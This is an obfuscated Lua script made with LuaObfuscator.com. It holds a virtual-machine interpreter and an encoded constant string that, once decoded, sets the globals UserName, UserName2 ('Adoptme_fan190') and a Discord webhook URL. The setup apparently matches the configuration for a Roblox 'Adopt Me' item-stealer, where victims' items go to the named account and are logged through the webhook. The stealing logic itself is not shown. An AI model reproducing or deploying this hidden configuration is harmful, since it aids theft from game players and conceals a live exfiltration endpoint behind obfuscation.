

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v23()local v31,v32=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v32 * (493 -237)) + v31 ;end v24=nil;function v24()local v33,v34,v35,v36=v1(v16,v19,v19 + 3 );v19=v19 + (10 -6) ;return (v36 * (16777835 -(555 + 64))) + (v35 * (66467 -(857 + 74))) + (v34 * (824 -((1294 -(214 + 713)) + 201))) + v33 ;end v25=nil;v18=3;end if (1==v18) then function v21(v37,v38,v39)if v39 then local v71=(v37/((1 + 1)^(v38-(1 + 0))))%((879 -(282 + 595))^(((v39-1) -(v38-1)) + 1)) ;return v71-(v71%(1638 -(1523 + 114))) ;else local v72=(117 -(32 + 85)) + 0 + 0 ;local v73;while true do if (v72==((0 + 0) -0)) then v73=2^(v38-(1066 -(68 + 997))) ;return (((v37%(v73 + v73))>=v73) and ((2228 -(892 + 65)) -((538 -312) + 1044))) or (0 -0) ;end end end end v22=nil;function v22()local v40=0 -0 ;local v41;while true do if (v40==(1 -0)) then return v41;end if (v40==(350 -(87 + 263))) then v41=v1(v16,v19,v19);v19=v19 + (181 -((164 -97) + 113)) ;v40=1 + 0 ;end end end v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v42)if (v1(v42,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v42,1,1));return "";end end else local v75=v2(v0(v42,16));if v20 then local v82=0;local v83;while true do if (v82==1) then return v83;end if (v82==0) then v83=v5(v75,v20);v20=nil;v82=1;end end else return v75;end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;function v30(v43,v44,v45)local v46=0;local v47;local v48;local v49;while true do if (v46==0) then v47=v43[1];v48=v43[2];v46=1;end if (v46==1) then v49=v43[3];return function(...)local v84=v47;local v85=v48;local v86=v49;local v87=v28;local v88=1;local v89= -1;local v90={};local v91={...};local v92=v12("#",...) -1 ;local v93={};local v94={};for v98=0,v92 do if (v98>=v86) then v90[v98-v86 ]=v91[v98 + 1 ];else v94[v98]=v91[v98 + 1 ];end end local v95=(v92-v86) + 1 ;local v96;local v97;while true do v96=v84[v88];v97=v96[1];if (v97<=4) then if (v97<=1) then if (v97>0) then v88=v96[3];else v45[v96[3]]=v94[v96[2]];end elseif (v97<=2) then do return;end elseif (v97>3) then v94[v96[2]]=v96[3];elseif (v94[v96[2]]==v96[4]) then v88=v88 + 1 ;else v88=v96[3];end elseif (v97<=6) then if (v97>5) then v94[v96[2]]=v96[3];else v45[v96[3]]=v94[v96[2]];end elseif (v97<=7) then do return;end elseif (v97==8) then if (v94[v96[2]]==v96[4]) then v88=v88 + 1 ;else v88=v96[3];end else v88=v96[3];end v88=v88 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==3) then function v25()local v50=0 + (1138 -(116 + 1022)) ;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v50==(3 -2)) then v53=1;v54=(v21(v52,953 -(802 + 150) ,20) * ((5 -(433 -(44 + 386)))^(57 -25))) + v51 ;v50=2 + 0 ;end if (v50==(1000 -((2401 -(998 + 488)) + 27 + 55))) then if (v55==((0 -0) -0)) then if (v54==0) then return v56 * (0 + 0 + 0) ;else v55=1 -0 ;v53=0;end elseif (v55==(3234 -(1069 + 118))) then return ((v54==(0 -0)) and (v56 * (((7 -5) -1)/(0 -0)))) or (v56 * NaN) ;end return v8(v56,v55-(178 + 845) ) * (v53 + (v54/(((3 + 0) -1)^((824 -(201 + 571)) + 0)))) ;end if (v50==(791 -(368 + 423))) then v51=v24();v52=v24();v50=3 -2 ;end if (v50==(20 -(10 + 8))) then v55=v21(v52,80 -59 ,473 -(416 + 26) );v56=((v21(v52,102 -70 )==((2 -1) + 0)) and  -1) or (1 -(0 + 0)) ;v50=441 -(145 + 293) ;end end end v26=nil;function v26(v57)local v58;if  not v57 then local v76=0 + 0 ;while true do if ((0 + 0)==v76) then v57=v24();if (v57==(1423 -(630 + 793))) then return "";end break;end end end v58=v3(v16,v19,(v19 + v57) -(886 -(261 + 624)) );v19=v19 + v57 ;local v59={};for v69=1 -0 , #v58 do v59[v69]=v2(v1(v3(v58,v69,v69)));end return v6(v59);end v27=v24;v18=4;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v60=0;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v60==(0 -0)) then v61=1990 -(582 + 1408) ;v62=nil;v60=1;end if (v60~=(6 -4)) then else v65=nil;v66=nil;v60=3;end if (v60==(1 -0)) then local v80=0 -0 ;while true do if (v80~=(1825 -(1195 + 629))) then else v60=2;break;end if (v80==(0 -0)) then v63=nil;v64=nil;v80=1;end end end if (v60==3) then local v81=241 -(187 + 54) ;while true do if (0~=v81) then else v67=nil;v68=nil;v81=1;end if (v81~=(781 -(162 + 618))) then else v60=4;break;end end end if ((3 + 1)~=v60) then else while true do if (1~=v61) then else v64=nil;v65=nil;v61=2 + 0 ;end if (v61~=(3 -1)) then else local v101=0 -0 ;local v102;while true do if (v101~=0) then else v102=0;while true do if (v102==(1 + 0)) then v61=3;break;end if (0~=v102) then else v66=nil;v67=nil;v102=1637 -(1373 + 263) ;end end break;end end end if (v61==(1000 -(451 + 549))) then local v103=0 + 0 ;while true do if (v103==(0 -0)) then v62=0;v63=nil;v103=1 -0 ;end if (v103==(1385 -(746 + 638))) then v61=1;break;end end end if (v61~=3) then else v68=nil;while true do local v108=0 + 0 ;local v109;while true do if ((0 -0)~=v108) then else v109=341 -(218 + 123) ;while true do if (v109==(1582 -(1535 + 46))) then if (2==v62) then local v124=0 + 0 ;while true do local v125=0;while true do if (v125~=0) then else if (v124==0) then local v126=0;while true do if (v126~=(1 + 0)) then else v124=1;break;end if ((560 -(306 + 254))~=v126) then else for v131=1 + 0 ,v24() do local v132=0;local v133;local v134;while true do if ((1 -0)~=v132) then else while true do if (0==v133) then v134=v22();if (v21(v134,1,1)~=(1467 -(899 + 568))) then else local v146=0 + 0 ;local v147;local v148;local v149;while true do if (v146==2) then if (v21(v148,2 -1 ,604 -(268 + 335) )~=1) then else v149[292 -(60 + 230) ]=v68[v149[2]];end if (v21(v148,574 -(426 + 146) ,2)~=(1 + 0)) then else v149[3]=v68[v149[1459 -(282 + 1174) ]];end v146=814 -(569 + 242) ;end if (v146~=1) then else v149={v23(),v23(),nil,nil};if (v147==(1271 -(945 + 326))) then local v159=0;local v160;while true do if ((0 -0)~=v159) then else v160=0 + 0 ;while true do if (v160~=0) then else v149[703 -(271 + 429) ]=v23();v149[4]=v23();break;end end break;end end elseif (v147==(1 + 0)) then v149[1503 -(1408 + 92) ]=v24();elseif (v147==2) then v149[3]=v24() -(2^(1102 -(461 + 625))) ;elseif (v147~=(1291 -(993 + 295))) then else local v168=0 + 0 ;local v169;while true do if (0==v168) then v169=0;while true do if (v169~=0) then else v149[1174 -(418 + 753) ]=v24() -(2^(7 + 9)) ;v149[4]=v23();break;end end break;end end end v146=2;end if (v146~=3) then else if (v21(v148,3,1 + 2 )~=1) then else v149[2 + 2 ]=v68[v149[2 + 2 ]];end v63[v131]=v149;break;end if (v146==0) then local v153=0;local v154;while true do if (v153~=(529 -(406 + 123))) then else v154=1769 -(1749 + 20) ;while true do if (v154==1) then v146=1;break;end if (v154==0) then local v165=0;while true do if (1~=v165) then else v154=1 + 0 ;break;end if ((1322 -(1249 + 73))~=v165) then else v147=v21(v134,2,2 + 1 );v148=v21(v134,4,1151 -(466 + 679) );v165=2 -1 ;end end end end break;end end end end end break;end end break;end if (v132~=0) then else v133=0 -0 ;v134=nil;v132=1;end end end for v135=1,v24() do v64[v135-(1901 -(106 + 1794)) ]=v29();end v126=1;end end end if (v124~=(1 + 0)) then else return v66;end break;end end end end break;end if (v109==(0 + 0)) then local v120=0;local v121;while true do if (v120~=0) then else v121=0 -0 ;while true do if (v121~=(0 -0)) then else if (0==v62) then local v127=0;local v128;while true do if (v127~=0) then else v128=0;while true do if (v128~=(116 -(4 + 110))) then else v62=585 -(57 + 527) ;break;end if (v128==(1428 -(41 + 1386))) then v65={};v66={v63,v64,nil,v65};v128=2;end if (v128~=(0 -0)) then else local v137=166 -(122 + 44) ;while true do if (v137==0) then v63={};v64={};v137=1;end if (v137==1) then v128=1 -0 ;break;end end end end break;end end end if (v62~=(3 -2)) then else local v129=0 + 0 ;local v130;while true do if (0~=v129) then else v130=0 + 0 ;while true do if ((3 -1)==v130) then v62=67 -(30 + 35) ;break;end if ((0 + 0)==v130) then local v138=1257 -(1043 + 214) ;local v139;while true do if (v138==0) then v139=0;while true do if (v139~=(0 -0)) then else local v150=1212 -(323 + 889) ;while true do if (v150==1) then v139=1;break;end if (v150==(0 -0)) then v67=v24();v68={};v150=1;end end end if (v139~=1) then else v130=1;break;end end break;end end end if (v130~=1) then else for v141=1,v67 do local v142=580 -(361 + 219) ;local v143;local v144;local v145;while true do if (v142==1) then v145=nil;while true do if (v143==(321 -(53 + 267))) then if (v144==(1 + 0)) then v145=v22()~=(413 -(15 + 398)) ;elseif (v144==(984 -(18 + 964))) then v145=v25();elseif (v144==3) then v145=v26();end v68[v141]=v145;break;end if (v143==(0 -0)) then v144=v22();v145=nil;v143=1;end end break;end if ((0 + 0)~=v142) then else v143=0;v144=nil;v142=1;end end end v66[3]=v22();v130=2;end end break;end end end v121=1 + 0 ;end if (v121==(851 -(20 + 830))) then v109=1 + 0 ;break;end end break;end end end end break;end end end break;end end break;end end end v18=5;end end end v15("LOL!073O00028O00026O00F03F03093O00557365724E616D6532030E3O0041646F70746D655F66616E31393003083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O34383638323835302O36373933302O312F50764A2D31734E432O335765344551557862425634396465575A6F72453748456E735F306245584D7A564C736F38725A443879385A6D585636395078776E484F5A2O775A00173O0012043O00013O0026033O0006000100020004013O00060001001204000100043O001205000100033O0004013O001600010026033O0001000100010004013O00010001001204000100013O00260300010010000100010004013O00100001001204000200043O001205000200053O001204000200073O001205000200063O001204000100023O00260300010009000100020004013O000900010012043O00023O0004013O000100010004013O000900010004013O000100012O00023O00017O00",v9(),...);
